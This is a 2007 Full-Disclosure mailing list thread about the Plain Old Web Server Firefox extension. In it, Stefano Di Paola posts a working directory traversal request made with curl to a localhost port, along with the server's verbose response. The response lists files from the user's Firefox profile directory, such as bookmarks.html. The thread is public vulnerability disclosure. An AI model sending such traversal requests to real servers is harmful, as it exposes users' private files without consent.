hei man, this is not a news :) On 2/9/07, Stefano Di Paola <[EMAIL PROTECTED]> wrote: > Plain Old Web Server > Good Old Dir Traversal > > curl "127.0.0.1:6670/../../../../" -kivvv > * About to connect() to 127.0.0.1 port 6670 > * Trying 127.0.0.1... connected > * Connected to 127.0.0.1 (127.0.0.1) port 6670 > > GET /../../../../ HTTP/1.1 > > User-Agent: HackTheHacker(tm) > > Host: 127.0.0.1:6670 > > Accept: */* > > > < HTTP/1.1 200 OK > HTTP/1.1 200 OK > < Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; > path=/; > Set-Cookie: bc_test=true; expires=Thu, 05 Nov 2009 18:35:36 GMT; path=/; > < Content-Type: text/html > Content-Type: text/html > < pow_server: POW/0.0.7 > pow_server: POW/0.0.7 > < Content-Location: /../../../../ > Content-Location: /../../../../ > < Content-Length: 280 > Content-Length: 280 > > <br><br><br><br> > <a href='/../../../../firefox/'>firefox/</a><br> > <a href='/../../../../bookmarks.html'>bookmarks.html</a><br> > <a href='/../../../../appreg'>appreg</a><br> > <a href='/../../../../default/'>default/</a><br> > <a href='/../../../../pluginreg.dat'>pluginreg.dat</a><br> > * Connection #0 to host 127.0.0.1 left intact > * Closing connection #0 > > > A new motto is on the way: > HackTheHacker (ascii (tm)) > > :) > > Cheers, > Stefano > > Il giorno ven, 09/02/2007 alle 16.23 +0000, pdp (architect) ha scritto: > > http://www.gnucitizen.org/blog/plain-old-webserver > > > > Must have Firefox Extension that allows you to do all sorts of crazy stuff. > > > > https://addons.mozilla.org/firefox/3002/ > > > -- > ...oOOo...oOOo.... > Stefano Di Paola > Software & Security Engineer > > Web: www.wisec.it > .................. > >
-- pdp (architect) | petko d. petkov http://www.gnucitizen.org _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
